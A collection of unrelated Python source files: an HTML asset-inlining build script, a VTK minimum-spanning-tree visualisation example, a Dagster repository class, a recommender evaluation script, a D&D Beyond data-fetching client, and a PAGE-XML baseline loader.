rePng = re.compile('url\\(([^)]+.png)\\)')
reGif = re.compile('url\\(([^)]+.gif)\\)')
reWoff = re.compile('url\\(([^)]+.woff)\\)')
def inlinify_script(match):
if match.group(2).strip() != '': raise Exception('script has body')
filename = match.group(1)
if filename == '/lib-client/node_modules/ethers/dist/ethers.min.js' and not UGLIFY:
filename = '/lib-client/node_modules/ethers/dist/ethers.js'
if filename.find('.min.') >= 0:
script = open(filename, 'rb').read().decode('utf8')
else:
if UGLIFY:
script = subprocess.check_output(['uglifyjs', filename]).decode('utf8')
else:
script = open(filename).read()
if filename == '/scripts/index.js':
undebug = script.replace('var DEBUG = true;', 'var DEBUG = false;')
if len(undebug) != len(script) + 1: raise Exception('DEBUG conversion error')
script = undebug
print("script", filename, len(script))
return '<script type="text/javascript">/* ' + filename + ' */ ' + script + '</script>'
def inlinify_style(match):
if match.group(0).find('rel="stylesheet"') == -1 or match.group(0).find('type="text/css"') == -1:
raise Exception('not a stylesheet')
if UGLIFY:
style = subprocess.check_output(['uglifycss', match.group(1)]).decode('utf8')
else:
style = open(match.group(1), 'rb').read().decode('utf8')
#style = reWoff.sub(inlinify_woff, style)
print("style", match.group(1), len(style))
return '<style type="text/css">/* ' + match.group(1) + ' */ ' + style + '</style>'
def inlinify_png(match):
png = open(match.group(1), 'rb').read()
print("png", match.group(1), len(png))
return 'url(data:image/png;base64,%s)' % base64.b64encode(png).decode('utf8')
def inlinify_jpg(match):
jpg = open(match.group(1), 'rb').read()
print("jpg", match.group(1), len(jpg))
return 'url(data:image/jpeg;base64,%s)' % base64.b64encode(jpg).decode('utf8')
def inlinify_gif(match):
gif = open(match.group(1), 'rb').read()
print("gif", match.group(1), len(gif))
return 'url(data:image/gif;base64,%s)' % base64.b64encode(gif).decode('utf8')
def inlinify_woff(match):
woff = open(match.group(1), "rb").read()
print("woff", match.group(1), len(woff))
return 'url(data:application/x-font-woff;charset=utf-8;base64,%s)' % base64.b64encode(woff).decode('utf8')
html = open('index.html').read()
print("html", "index.html", len(html))
html = reScript.sub(inlinify_script, html)
html = reWoff.sub(inlinify_woff, html)
html = reStyle.sub(inlinify_style, html)
html = rePng.sub(inlinify_png, html)
html = reJpg.sub(inlinify_jpg, html)
html = reGif.sub(inlinify_gif, html)
#html = reDevOnly.sub('PRODUCTION', html);
EthersHashTag = '<ETHERS_HASH>'
data = html.replace(EthersHashTag, '').encode('utf8')
if len(data) + len(EthersHashTag) != len(html.encode('utf8')):
raise Exception('ETHERS_HASH conversion bug')
ethersHash = hashlib.sha256(data).hexdigest()
data = html.replace(EthersHashTag, '0x' + ethersHash).encode('utf8');
open('./dist/index.html', 'wb').write(data)
print("hash: " + ethersHash)
print("html", "./dist/index.html", len(data))
|
<filename>IMU/VTK-6.2.0/Examples/Infovis/Python/boost_mst_with_hgv.py<gh_stars>1-10
#!/usr/bin/env python
from vtk import *
source = vtkRandomGraphSource()
source.DirectedOff()
source.SetNumberOfVertices(100)
source.SetEdgeProbability(0.1)
source.SetUseEdgeProbability(True)
source.AllowParallelEdgesOn()
source.AllowSelfLoopsOn()
source.SetStartWithTree(True)
# Connect to the centrality filter.
centrality = vtkBoostBrandesCentrality ()
centrality.SetInputConnection(source.GetOutputPort())
# Find the minimal spanning tree
mstTreeSelection = vtkBoostKruskalMinimumSpanningTree()
mstTreeSelection.SetInputConnection(centrality.GetOutputPort())
mstTreeSelection.SetEdgeWeightArrayName("centrality")
mstTreeSelection.NegateEdgeWeightsOn()
mstTreeSelection.Update()
# Take selection and extract a graph
extract_graph = vtkExtractSelectedGraph()
extract_graph.AddInputConnection(centrality.GetOutputPort())
extract_graph.SetSelectionConnection(mstTreeSelection.GetOutputPort())
# Extract a tree from the graph
extract_tree = vtkBoostBreadthFirstSearchTree()
extract_tree.AddInputConnection(extract_graph.GetOutputPort())
# Create a graph layout view
view = vtkGraphLayoutView()
view.AddRepresentationFromInputConnection(centrality.GetOutputPort())
view.SetVertexLabelArrayName("centrality")
view.SetVertexLabelVisibility(True)
view.SetVertexColorArrayName("centrality")
view.SetColorVertices(True)
view.SetEdgeColorArrayName("centrality")
view.SetColorEdges(True)
view.SetLayoutStrategyToSimple2D()
# Setup a couple layout strategies so we can switch
# them out for comparison
treeStrat = vtkTreeLayoutStrategy();
treeStrat.RadialOn()
treeStrat.SetAngle(120)
treeStrat.SetLogSpacingValue(1)
forceStrat = vtkSimple2DLayoutStrategy()
forceStrat.SetEdgeWeightField("centrality")
# Create an HGV
view2 = vtkHierarchicalGraphView()
view2.SetHierarchyFromInputConnection(extract_tree.GetOutputPort())
view2.SetGraphFromInputConnection(centrality.GetOutputPort())
view2.SetVertexColorArrayName("centrality")
view2.SetColorVertices(True)
view2.SetVertexLabelArrayName("centrality")
view2.SetVertexLabelVisibility(True)
view2.SetEdgeColorArrayName("centrality")
view2.SetColorEdges(True)
view2.SetBundlingStrength(.75)
view2.SetLayoutStrategy(forceStrat)
#view2.SetLayoutStrategy(treeStrat)
# Make sure all views are using a pedigree id selection
view.GetRepresentation(0).SetSelectionType(2)
view2.GetRepresentation(0).SetSelectionType(2)
# Create a selection link and set both view to use it
annotationLink = vtkAnnotationLink()
view.GetRepresentation(0).SetAnnotationLink(annotationLink)
view2.GetRepresentation(0).SetAnnotationLink(annotationLink)
annotationLink.SetCurrentSelection(mstTreeSelection.GetOutput())
# Make updater to update views on selection change
updater = vtkViewUpdater()
updater.AddView(view)
updater.AddView(view2)
# Set the theme on the view
theme = vtkViewTheme.CreateMellowTheme()
theme.SetLineWidth(4)
theme.SetPointSize(8)
theme.SetSelectedCellColor(1,0,1)
theme.SetSelectedPointColor(1,0,1)
view.ApplyViewTheme(theme)
theme.SetLineWidth(1)
view2.ApplyViewTheme(theme)
theme.FastDelete()
view.GetRenderWindow().SetSize(600, 600)
view.ResetCamera()
view.Render()
view2.GetRenderWindow().SetSize(600, 600)
view2.ResetCamera()
view2.Render()
view.GetInteractor().Start()
|
<gh_stars>0
from dagster import check
from dagster.core.errors import DagsterInvalidDefinitionError, DagsterInvariantViolationError
from .pipeline import PipelineDefinition
class RepositoryDefinition(object):
'''Define a repository that contains a collection of pipelines.
Args:
name (str): The name of the pipeline.
pipeline_dict (Dict[str, Union[callable, PipelineDefinition]):
An dictionary of pipelines. The value of the dictionary is a function that takes
no parameters and returns a PipelineDefiniton.
We pass callables instead of the PipelineDefinitions itself so that they can be
created on demand when accessed by name.
As the pipelines are retrieved it ensures that the keys of the dictionary and the
name of the pipeline are the same.
repo_config (Optional[dict]):
Preset configurations for pipelines such as environments and execution subsets
'''
def __init__(self, name, pipeline_dict):
self.name = check.str_param(name, 'name')
check.dict_param(pipeline_dict, 'pipeline_dict', key_type=str)
for val in pipeline_dict.values():
check.invariant(
callable(val) or isinstance(val, PipelineDefinition),
(
'Value in pipeline_dict must be function, an @pipeline function, '
'or a PipelineDefinition instance '
),
)
self.pipeline_dict = pipeline_dict
self._pipeline_cache = {}
self._all_pipelines = None
self._solid_defs = None
@property
def pipeline_names(self):
return list(self.pipeline_dict.keys())
@staticmethod
def eager_construction(name, pipelines, *args, **kwargs):
'''Useful help when you are unconcerned about the the performance of
pipeline construction. You can just pass a list of pipelines and it will
handle constructing the dictionary of pipeline name to functions for you'''
check.list_param(pipelines, 'pipelines', of_type=PipelineDefinition)
# avoids lint violation cell-var-from-loop and crazy loop scoping rules
# see https://stackoverflow.com/questions/12423614/
def lambdify(item):
return lambda: item
return RepositoryDefinition(
name, {pipeline.name: lambdify(pipeline) for pipeline in pipelines}, *args, **kwargs
)
def has_pipeline(self, name):
check.str_param(name, 'name')
return name in self.pipeline_dict
def _resolve_pipeline(self, name):
check.str_param(name, 'name')
if name not in self.pipeline_dict:
raise DagsterInvariantViolationError(
'Could not find pipeline "{name}". Found: {pipeline_names}.'.format(
name=name,
pipeline_names=', '.join(
[
'"{pipeline_name}"'.format(pipeline_name=name)
for pipeline_name in self.pipeline_dict.keys()
]
),
)
)
entry = self.pipeline_dict[name]
if isinstance(entry, PipelineDefinition):
return entry
elif callable(entry):
return entry()
else:
check.failed('Should be pipeline or callable')
def get_pipeline(self, name):
'''Get a pipeline by name. Only constructs that pipeline and caches it.
Args:
name (str): Name of the pipeline to retriever
Returns:
PipelineDefinition: Instance of PipelineDefinition with that name.
'''
check.str_param(name, 'name')
if name in self._pipeline_cache:
return self._pipeline_cache[name]
pipeline = self._resolve_pipeline(name)
self._pipeline_cache[name] = check.inst(
pipeline,
PipelineDefinition,
(
'Function passed into pipeline_dict with key {key} must return a '
'PipelineDefinition'
).format(key=name),
)
return pipeline
def get_all_pipelines(self):
'''Return all pipelines as a list
Returns:
List[PipelineDefinition]:
'''
if self._all_pipelines:
return self._all_pipelines
self._all_pipelines = list(map(self.get_pipeline, self.pipeline_dict.keys()))
# This does uniqueness check
self.get_all_solid_defs()
return self._all_pipelines
def get_all_solid_defs(self):
if self._solid_defs:
return self._solid_defs
self._solid_defs = self._construct_solid_defs()
return list(self._solid_defs.values())
def _construct_solid_defs(self):
solid_defs = {}
solid_to_pipeline = {}
# This looks like it should infinitely loop but the
# memoization of all_pipelines and _solids_defs short
# circuits that
for pipeline in self.get_all_pipelines():
for solid_def in pipeline.solid_defs:
if solid_def.name not in solid_defs:
solid_defs[solid_def.name] = solid_def
solid_to_pipeline[solid_def.name] = pipeline.name
if not solid_defs[solid_def.name] is solid_def:
first_name, second_name = sorted(
[solid_to_pipeline[solid_def.name], pipeline.name]
)
raise DagsterInvalidDefinitionError(
(
'You have defined two solid definitions named "{solid_def_name}" '
'in repository "{repository_name}". Solid definition names must be '
'unique within a repository. The solid definition has been defined in '
'pipeline "{first_pipeline_name}" and it has been defined '
'again in pipeline "{second_pipeline_name}."'
).format(
solid_def_name=solid_def.name,
repository_name=self.name,
first_pipeline_name=first_name,
second_pipeline_name=second_name,
)
)
return solid_defs
def solid_def_named(self, name):
check.str_param(name, 'name')
self.get_all_solid_defs()
if name not in self._solid_defs:
check.failed('could not find solid_def {}'.format(name))
return self._solid_defs[name]
|
from sklearn.metrics import accuracy_score, average_precision_score, coverage_error, label_ranking_average_precision_score, pairwise, roc_curve, auc, roc_auc_score, average_precision_score,precision_recall_curve, precision_score, recall_score, f1_score, precision_recall_fscore_support, confusion_matrix, classification_report
import numpy as np
from sklearn.preprocessing import normalize
from scipy.sparse import csr_matrix
import pandas as pd
import argparse
from joblib import Parallel, delayed
import os
import tempfile
import shutil
import common
import json
import time
import matplotlib
matplotlib.use('Agg')
matplotlib.rcParams['xtick.labelsize'] = 15
matplotlib.rcParams['ytick.labelsize'] = 15
#matplotlib.rcParams['ylabel.size'] = 20
from matplotlib import rcParams
rcParams.update({'figure.autolayout': True})
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")
RANDOM_SELECTION=False
PLOT_MATRIX=False
test_matrix=[]
test_matrix_imp = []
sim_matrix=[]
def load_sparse_csr(filename):
loader = np.load(filename)
return csr_matrix(( loader['data'], loader['indices'], loader['indptr']),
shape = loader['shape'])
def apk(actual, predicted, k=10):
"""
Computes the average precision at k.
This function computes the average prescision at k between two lists of
items.
Parameters
----------
actual : list
A list of elements that are to be predicted (order doesn't matter)
predicted : list
A list of predicted elements (order does matter)
k : int, optional
The maximum number of predicted elements
Returns
-------
score : double
The average precision at k over the input lists
"""
if len(predicted)>k:
predicted = predicted[:k]
score = 0.0
num_hits = 0.0
for i,p in enumerate(predicted):
if p in actual and p not in predicted[:i]:
num_hits += 1.0
score += num_hits / (i+1.0)
if not actual:
return 0.0
return score / min(len(actual), k)
def mapk(actual, predicted, k=10):
"""
Computes the mean average precision at k.
This function computes the mean average prescision at k between two lists
of lists of items.
Parameters
----------
actual : list
A list of lists of elements that are to be predicted
(order doesn't matter in the lists)
predicted : list
A list of lists of predicted elements
(order matters in the lists)
k : int, optional
The maximum number of predicted elements
Returns
-------
score : double
The mean average precision at k over the input lists
"""
return np.mean([apk(a,p,k) for a,p in zip(actual, predicted)])
def dcg_at_k(r, k):
"""
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
k: Number of results to consider
Returns:
Discounted cumulative gain
"""
r = np.asfarray(r)[:k]
if r.size:
return np.sum(r / np.log2(np.arange(2, r.size + 2)))
return 0.
def ndcg_at_k(r, k):
"""
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
k: Number of results to consider
Returns:
Normalized discounted cumulative gain
"""
dcg_max = dcg_at_k(sorted(r, reverse=True), k)
if not dcg_max:
return 0.
return dcg_at_k(r, k) / dcg_max
def precision_at_k(r, k):
"""Score is precision @ k
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
Precision @ k
"""
#return np.mean(np.asarray(r)[:k])
### ALS evaluation
rk = r[:k]
return rk[rk>0].shape[0]*1.0/k
def do_process_map(i,K,mapk):
sim_list = sim_matrix[:,i]
rank = np.argsort(sim_list)[::-1]
pred = np.asarray(test_matrix[rank[:K],i].todense()).reshape(-1)
p=0.0
for k in range(1,K+1):
p+=precision_at_k(pred,k)
mapk[i]=p/K
def do_process(i,predicted_row,actual_row,ks,p,ndcg,adiv):
rank = np.argsort(predicted_row)[::-1]
pred = np.asarray(actual_row[rank[:ks[-1]]]).reshape(-1)
for j,k in enumerate(ks):
p[j][i] += precision_at_k(pred,k)
ndcg[j][i] += ndcg_at_k(pred,k)
adiv[j][rank[:k]] = 1
def print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False, hide_threshold=None):
"""pretty print for confusion matrixes"""
columnwidth = max([len(x) for x in labels]+[5]) # 5 is value length
empty_cell = " " * columnwidth
# Print header
print " " + empty_cell,
for label in labels:
print "%{0}s".format(columnwidth) % label,
print
# Print rows
for i, label1 in enumerate(labels):
print " %{0}s".format(columnwidth) % label1,
for j in range(len(labels)):
cell = "%{0}.1f".format(columnwidth) % cm[i, j]
if hide_zeroes:
cell = cell if float(cm[i, j]) != 0 else empty_cell
if hide_diagonal:
cell = cell if i != j else empty_cell
if hide_threshold:
cell = cell if cm[i, j] > hide_threshold else empty_cell
print cell,
print
def plot_confusion_matrix(cm, labels, title='Confusion matrix', cmap=plt.cm.Blues):
plt.imshow(cm, interpolation='nearest', cmap=cmap)
#plt.title(title, **csfont)
plt.colorbar()
tick_marks = np.arange(len(labels))
plt.xticks(tick_marks, labels, rotation=90)
plt.yticks(tick_marks, labels)
#plt.xticks(tick_marks, rotation=90)
#plt.yticks(tick_marks)
csfont = {'fontname':'Times', 'fontsize':'17'}
plt.tight_layout()
plt.ylabel('True label', **csfont)
plt.xlabel('Predicted label', **csfont)
def evaluate(model_id,model_settings,str_config,predictions,predictions_index,binary_classification=False,start_user=0,num_users=1000,get_roc=False,get_map=False,get_p=False,batch=False):
global test_matrix
global sim_matrix
local_path = common.DATASETS_DIR
# Load factors and ground truth
if model_settings['evaluation'] in ['binary','multiclass','multilabel']:
actual_matrix = np.load(common.DATASETS_DIR+'/y_test_%s_%s_%s.npy' % (model_settings['fact'],model_settings['dim'],model_settings['dataset']))
good_classes = np.nonzero(actual_matrix.sum(0))[0]
actual_matrix_roc = actual_matrix_map = actual_matrix[:,good_classes]
else:
index_matrix = open(common.DATASETS_DIR+'/items_index_test_%s.tsv' % (model_settings['dataset'])).read().splitlines()
index_matrix_inv = dict((item,i) for i,item in enumerate(index_matrix))
index_good = [index_matrix_inv[item] for item in predictions_index]
actual_matrix = load_sparse_csr(local_path+'/matrix_test_%s.npz' % model_settings['dataset'])
actual_matrix_map = actual_matrix[:,start_user:min(start_user+num_users,actual_matrix.shape[1])]
actual_matrix_roc = actual_matrix_map[index_good] # Items-Users matrix
if model_settings['fact'] in ['pmi','als']:
if model_settings['evaluation'] == 'recommendation':
user_factors = np.load(local_path+'/user_factors_%s_%s_%s.npy' % (model_settings['fact'],model_settings['dim'],model_settings['dataset']))
else:
user_factors = np.load(local_path+'/class_factors_%s_%s_%s.npy' % (model_settings['fact'],model_settings['dim'],model_settings['dataset']))
user_factors = user_factors[start_user:min(start_user+num_users,user_factors.shape[0])]
# Predicted matrix
if model_settings['fact'] == 'class':
predicted_matrix_map = predictions
predicted_matrix_roc = predictions[:,good_classes]
else:
if model_settings['fact'] == 'pmi':
predicted_matrix_roc = pairwise.cosine_similarity(np.nan_to_num(predictions),np.nan_to_num(user_factors))
predicted_matrix_map = predicted_matrix_roc.copy()
else:
predicted_matrix_roc = normalize(np.nan_to_num(predictions)).dot(user_factors.T) # Items-Users
predicted_matrix_map = predicted_matrix_roc.copy().T # Users-Items
if get_map and model_settings['evaluation'] in ['recommendation']:
actual_matrix_map = actual_matrix_roc.T.toarray()
if get_roc and model_settings['evaluation'] in ['recommendation']:
actual_matrix_roc.data = actual_matrix_roc.data / actual_matrix_roc.data
good_classes = np.nonzero(actual_matrix_roc.sum(axis=0))[1]
actual_matrix_roc = actual_matrix_roc[:,good_classes].toarray()
predicted_matrix_roc = predicted_matrix_roc[:,good_classes]
print 'Computed prediction matrix'
print model_id
print model_settings['dataset']
print model_settings['configuration']
if 'meta-suffix' in model_settings:
print model_settings['meta-suffix']
if not batch:
if not os.path.exists(common.RESULTS_DIR):
os.makedirs(common.RESULTS_DIR)
fw=open(common.RESULTS_DIR+'/eval_results.txt','a')
fw.write(model_id+'\n')
fw.write(model_settings['dataset']+"\n")
fw.write(model_settings['configuration']+"\n")
if 'meta-suffix' in model_settings:
fw.write(model_settings['meta-suffix']+"\n")
print model_settings['evaluation']
if model_settings['evaluation'] in ['binary','multiclass']:
print "entro y no deberia"
actual_matrix_map = actual_matrix_map
labels = open(common.DATASETS_DIR+"/genre_labels_%s.tsv" % model_settings['dataset']).read().splitlines()
predicted_matrix_binary = np.zeros(predicted_matrix_roc.shape)
predicted_labels = []
actual_labels = []
for i in range(predicted_matrix_roc.shape[0]):
predicted_matrix_binary[i,np.argmax(predicted_matrix_roc[i])] = 1
predicted_labels.append(labels[np.argmax(predicted_matrix_roc[i])])
actual_labels.append(labels[np.argmax(actual_matrix_roc[i])])
acc = accuracy_score(actual_labels,predicted_labels)
prec = precision_score(actual_labels,predicted_labels,average='macro',labels=labels)
recall = recall_score(actual_labels,predicted_labels,average='macro',labels=labels)
f1 = f1_score(actual_labels,predicted_labels,average='macro',labels=labels)
print 'Accuracy', acc
print "Precision %.3f\tRecall %.3f\tF1 %.3f" % (prec,recall,f1)
print [(i,l) for i,l in enumerate(labels)]
micro_prec = precision_score(actual_labels,predicted_labels,average='micro',labels=labels)
print "Micro precision", micro_prec
print classification_report(actual_labels,predicted_labels,target_names=labels)
if PLOT_MATRIX:
# Normalize the confusion matrix by row (i.e by the number of samples in each class)
cm = confusion_matrix(actual_labels,predicted_labels,labels=labels)
#print_cm(cm, labels)
#plt.figure()
#plot_confusion_matrix(cm, title='Not Normalized confusion matrix')
#plt.savefig('confusion_notNormalized.png')
#M = cm.sum(axis=1)
#print M
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('Normalized confusion matrix')
#print_cm(cm, labels)
plt.figure()
plot_confusion_matrix(cm, labels, title='Normalized confusion matrix')
plt.savefig('confusion_%s.png' % model_id)
if batch:
try:
if not os.path.exists(common.DATA_DIR+"/eval/%s-%s/" % (model_id,num_users)):
os.makedirs(common.DATA_DIR+"/eval/%s-%s/" % (model_id,num_users))
except:
pass
# MAP@k
if get_map:
fname = common.DATA_DIR+"/eval/%s-%s/map_%s.txt" % (model_id,num_users,start_user)
if not os.path.isfile(fname) or not batch:
k = 500
actual = [list(np.where(actual_matrix_map[i] > 0)[0]) for i in range(actual_matrix_map.shape[0])]
predicted = list([list(l)[::-1][:k] for l in predicted_matrix_map.argsort(axis=1)])
map500 = mapk(actual, predicted, k)
if batch:
fw_map = open(fname,"w")
fw_map.write(str(map500))
fw_map.close()
else:
fw.write('MAP@500: %.5f\n' % map500)
print 'MAP@500: %.5f' % map500
# ROC
if get_roc:
fname = common.DATA_DIR+"/eval/%s-%s/roc_%s.txt" % (model_id,num_users,start_user)
#if not os.path.isfile(fname):
roc_auc = roc_auc_score(actual_matrix_roc,predicted_matrix_roc)
print 'ROC-AUC: %.5f' % roc_auc
pr_auc = average_precision_score(actual_matrix_roc,predicted_matrix_roc)
print 'PR-AUC: %.5f' % pr_auc
if batch:
fw_roc = open(fname,"w")
fw_roc.write(str(roc_auc))
fw_roc.close()
else:
fw.write('ROC-AUC: %.5f\n' % roc_auc)
fw.write('PR-AUC: %.5f\n' % pr_auc)
# P@k
if get_p:
ks = [1,3,5]
folder = tempfile.mkdtemp()
p = np.memmap(os.path.join(folder, 'p'), dtype='f',shape=(len(ks),predicted_matrix_map.shape[0]), mode='w+')
adiv = np.memmap(os.path.join(folder, 'adiv'), dtype='f',shape=(len(ks),predicted_matrix_map.shape[1]), mode='w+')
ndcg = np.memmap(os.path.join(folder, 'ndcg'), dtype='f',shape=(len(ks),predicted_matrix_map.shape[0]), mode='w+')
Parallel(n_jobs=20)(delayed(do_process)(i,predicted_matrix_map[i,:],actual_matrix_map[i,:],ks,p,ndcg,adiv)
for i in range(0,predicted_matrix_map.shape[0]))
line_p=[]
line_n=[]
line_a=[]
for i,k in enumerate(ks):
pk = p[i].mean()
nk = ndcg[i].mean()
ak = adiv[i].sum() / predicted_matrix_map.shape[1]
print 'P@%d: %.2f' % (k, pk)
print 'nDCG@%d: %.2f' % (k, nk)
print 'ADiv/C@%d: %.2f' % (k, ak)
fw.write('P@%d: %.2f\n' % (k, pk))
fw.write('nDCG@%d: %.2f\n' % (k, nk))
fw.write('ADiv/C@%d: %.2f\n' % (k, ak))
line_p.append(pk)
line_n.append(nk)
line_a.append(ak)
try:
shutil.rmtree(folder)
except:
print("Failed to delete: " + folder)
if not batch:
fw.write('\n')
fw.write(str_config)
fw.write('\n')
fw.close()
print model_id
def do_eval(model_id, get_roc=False, get_map=False, get_p=False, start_user=0, num_users=10000, batch=False, predictions=[], predictions_index=[], meta=""):
if 'model' not in model_id:
items = model_id.split('_')
model_settings = dict()
model_settings['fact'] = items[1]
model_settings['dim'] = int(items[2])
model_settings['dataset'] = items[3]
model_arch = dict()
if model_settings['fact'] == 'class':
model_arch['final_activation'] = 'softmax'
else:
model_arch['final_activation'] = 'linear'
model_settings['configuration'] = "gt"
str_config = model_id
else:
read = False
x=0
while not read or x >= 100:
try:
trained_models = pd.read_csv(common.DEFAULT_TRAINED_MODELS_FILE, sep='\t')
model_config = trained_models[trained_models["model_id"] == model_id]
if model_config.empty:
raise ValueError("Can't find the model %s in %s" %
(model_id, common.DEFAULT_TRAINED_MODELS_FILE))
model_config = model_config.to_dict(orient="list")
read = True
except:
pass
x+=1
time.sleep(1)
model_settings=eval(model_config['dataset_settings'][0])
model_arch=eval(model_config['model_arch'][0])
model_training=eval(model_config['training_params'][0])
str_config = json.dumps(model_settings)+"\n"+json.dumps(model_arch)+"\n"+json.dumps(model_training)+"\n"
if meta != "" and "meta_suffix" not in model_settings:
model_settings["meta-suffix"] = meta
model_settings["loss"] = model_training['loss_func']
if predictions==[]:
predictions=np.load(common.PREDICTIONS_DIR+'/pred_%s.npy' % (model_id))
predictions_index=open(common.PREDICTIONS_DIR+'/index_pred_%s.tsv' % (model_id)).read().splitlines()
binary_classification = False
if model_settings["evaluation"] == "binary":
binary_classification = True
evaluate(model_id, model_settings, str_config, predictions, predictions_index, binary_classification, start_user, num_users, get_roc, get_map, get_p, batch)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Evaluates the model',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(dest="model_id",
type=str,
help='Identifier of the Model to evaluate')
parser.add_argument('-roc',
'--roc',
dest="get_roc",
help='Roc-auc evaluation',
action='store_true',
default=False)
parser.add_argument('-map',
'--map',
dest="get_map",
help='Map evaluation',
action='store_true',
default=False)
parser.add_argument('-p',
'--precision',
dest="get_p",
help='Precision evaluation',
action='store_true',
default=False)
parser.add_argument('-ms',
'--meta',
dest="meta",
help='Meta suffix',
default="")
parser.add_argument('-su',
'--start_user',
dest="start_user",
type=int,
help='First user to start evaluation',
default=0)
parser.add_argument('-nu',
'--num_users',
dest="num_users",
type=int,
help='Number of users for evaluation',
default=1000)
parser.add_argument('-ls',
'--local_storage',
dest="use_local_storage",
help='Set if use local copy of matrices in the node',
action='store_true',
default=False)
parser.add_argument('-b',
'--batch',
dest="batch",
help='Batch process in cluster',
action='store_true',
default=False)
args = parser.parse_args()
do_eval(args.model_id,args.get_roc,args.get_map,args.get_p,args.start_user,args.num_users,args.batch,meta=args.meta)
|
from pathlib import Path
import logging
import requests
import json
import time
import os
import src.config as config
logging.basicConfig(level=logging.INFO)
class DnDBeyondProxy:
def __init__(self, cobalt_key, output_folder=None):
self._last_auth = None
self._token = None
self._token_death_timestamp = None
self._cobalt = cobalt_key
self._output_folder = os.path.join('..', 'data', 'output') if not output_folder else output_folder
# Get D&D Beyond mapping JSON file
logging.info('Loading mapping.json')
with open(os.path.join('..', 'meta', 'mapping.json'), mode='r', encoding='utf8') as fd:
self._mapping = json.load(fd)
# Build mappings
self._stealth_map = {x['id']: x['name'] for x in self._mapping['stealthCheckTypes']}
self._attack_map = {x['id']: x['name'] for x in self._mapping['rangeTypes']}
self._category_map = {x['id']: x['name'] for x in self._mapping['weaponCategories']}
self._source_map = {x['id']: x['name'] for x in self._mapping['sources']}
self._armor_map = {x['id']: x['name'] for x in self._mapping['armorTypes']}
self._gear_map = {x['id']: x['name'] for x in self._mapping['gearTypes']}
def _authenticate(self):
if not self._token or self._token_death_timestamp <= time.time():
logging.info('Requesting new bearer token')
try:
headers = {'Cookie': 'CobaltSession={0}'.format(self._cobalt)}
self._last_auth = time.time()
result = requests.post(config.AUTH_URL, headers=headers).json()
self._token = result['token']
self._token_death_timestamp = self._last_auth + result['ttl']
except KeyError:
raise ConnectionError('Failed to authenticate using Cobalt key.')
def _dump_data(self, data, filename, raw=True):
data_type = 'raw' if raw else 'processed'
final_path = os.path.join(self._output_folder, data_type)
Path(final_path).mkdir(parents=True, exist_ok=True)
with open(os.path.join(final_path, filename), mode='w') as fd:
json.dump(data, fd)
def get_items(self):
self._authenticate()
try:
headers = {'Authorization': 'Bearer {0}'.format(self._token)}
result = requests.get(config.ITEMS_URL, headers=headers)
result = result.json()
self._dump_data(result['data'], 'items.json')
except KeyError:
raise RuntimeError('Failed to obtain items.')
def get_monsters(self, skip_size=100):
aggregator = []
count_current = None
skip = 0
while count_current is None or count_current > 0:
self._authenticate()
try:
logging.info('Fetching {0} monsters after skipping {1}'.format(100, skip))
headers = {'Authorization': 'Bearer {0}'.format(self._token)}
params = {'skip': skip, 'take': 100, 'showHomebrew': 'f'}
result = requests.get(config.MONSTER_URL, headers=headers, params=params).json()
count_current = len(result['data'])
aggregator = [*aggregator, *result['data']]
skip += skip_size
except KeyError:
raise RuntimeError('Failed to obtain monsters.')
self._dump_data(aggregator, 'monsters.json')
def get_spells(self):
classes = {x['id'] for x in self._mapping['classConfigurations']}
aggregator = []
for class_id in classes:
logging.info('Fetching spells for class ID {0}'.format(class_id))
self._authenticate()
try:
headers = {'Authorization': 'Bearer {0}'.format(self._token)}
params = {'classId': class_id, 'classLevel': 20}
result = requests.get(config.SPELLS_URL, headers=headers, params=params).json()['data']
aggregator = [*aggregator, *result] # Merge new results with the previous ones
except KeyError:
raise RuntimeError('Failed to obtain spells.')
self._dump_data(aggregator, 'spells.json')
def process_items(self, input_file=None):
if not input_file:
input_file = os.path.join('..', 'data', 'output', 'raw', 'items.json')
output_file = os.path.join(self._output_folder, 'processed', 'items.json')
# Read input file
with open(input_file, mode='r', encoding='utf8') as fd:
data = json.load(fd)
logging.info('Processing items')
result = [self._process_item(x) for x in data]
# Write to file
self._dump_data(result, 'items.json', raw=False)
def _process_item(self, item):
""" --- List of processed data ---
<in items.json> <=> <in mapping.json>
stealthCheck <=> stealthCheckTypes
attackType <=> rangeTypes (Most likely guess?)
categoryId <=> weaponCategories
sourceId <=> sources
armorTypeId <=> armorTypes
gearTypeId <=> gearTypes
"""
logging.debug('Processing item {0}'.format(item['name']))
# Apply mappings
item['stealthCheck'] = self._stealth_map[item['stealthCheck']] if item['stealthCheck'] else None
item['attackType'] = self._attack_map[item['attackType']] if item['attackType'] else None
item['category'] = self._category_map[item['categoryId']] if item['categoryId'] else None
item['source'] = self._source_map[item['sourceId']] if item['sourceId'] else None
for source in item['sources']:
source['sourceName'] = self._source_map[source['sourceId']] if source['sourceId'] else None
item['armorType'] = self._armor_map[item['armorTypeId']] if item['armorTypeId'] else None
item['gearType'] = self._gear_map[item['gearTypeId']] if item['gearTypeId'] else None
return item
|
<reponame>CITlabRostock/citlab-article-separation-new
# -*- coding: utf-8 -*-
import jpype
import numpy as np
import os
from argparse import ArgumentParser
from python_util.basic.flags import str2bool
from python_util.parser.xml.page.page import Page
from python_util.math.measure import f_measure
from article_separation_measure.eval_measure import BaselineMeasureEval
def get_data_from_pagexml(path_to_pagexml):
"""
:param path_to_pagexml: file path
:return: dictionary with the article / block ID's as keys and a list of corresponding baselines (given by polygons)
as values
"""
art_polygons_dict = {}
try:
# load the page xml file
page_file = Page(path_to_xml=path_to_pagexml)
# get all text lines article wise
art_txtlines_dict = page_file.get_article_dict()
except():
print("!! Can not load the lines of the Page XML {} !!\n".format(path_to_pagexml))
return art_polygons_dict
for article_id in art_txtlines_dict:
for txtline in art_txtlines_dict[article_id]:
try:
# get the baseline of the text line as polygon
polygon = txtline.baseline.to_polygon()
# skipp baselines with less than two points
if len(polygon.x_points) == len(polygon.y_points) > 1:
if article_id in art_polygons_dict:
art_polygons_dict[article_id].append(polygon)
else:
art_polygons_dict.update({article_id: [polygon]})
except():
print("!! 'NoneType' object with id {} has no attribute 'to_polygon' !!\n".format(txtline.id))
continue
return art_polygons_dict
